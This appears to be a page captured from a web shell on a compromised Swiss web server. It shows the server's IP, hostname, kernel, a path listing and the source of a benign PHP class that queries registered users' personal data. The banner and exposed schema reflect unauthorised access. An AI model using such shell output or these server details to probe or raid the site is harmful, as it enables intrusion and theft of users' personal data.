uawdijnntqw1x1x1
IP : 216.73.216.39
Hostname : diefsweb003.fsit.ch
Kernel : Linux diefsweb003.fsit.ch 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
wirbesti
/
nousdecidons.ch
/
472b8
/
..
/
..
/
public_html
/
php
/
.
/
User.php
/
/
<?php class User { private $con; // Database Connection public function __construct(DBConnection $database) { $this->con = $database; return $this->con; } public function getUserById(int $id) { $query = "SELECT `aid`, `user_id`, `created`, `modified`, `anrede`, `firstname`, `lastname`, `streetno`, `zipcode`, `ort`, `email`, `mobile`, `date_of_birth`, `phone`, `comments`, `member-club`, `language` FROM `nvbjn_data_registeredusers` u ". "WHERE u.user_id = :id;"; $getuser = $this->con->dbc->prepare($query); $getuser->bindParam(':id', $id); $getuser->execute(); $result = $getuser->fetch(); if ($result) { return $result; } else { echo "Record not found"; } } } ?>
/home/wirbesti/nousdecidons.ch/472b8/../../public_html/php/./User.php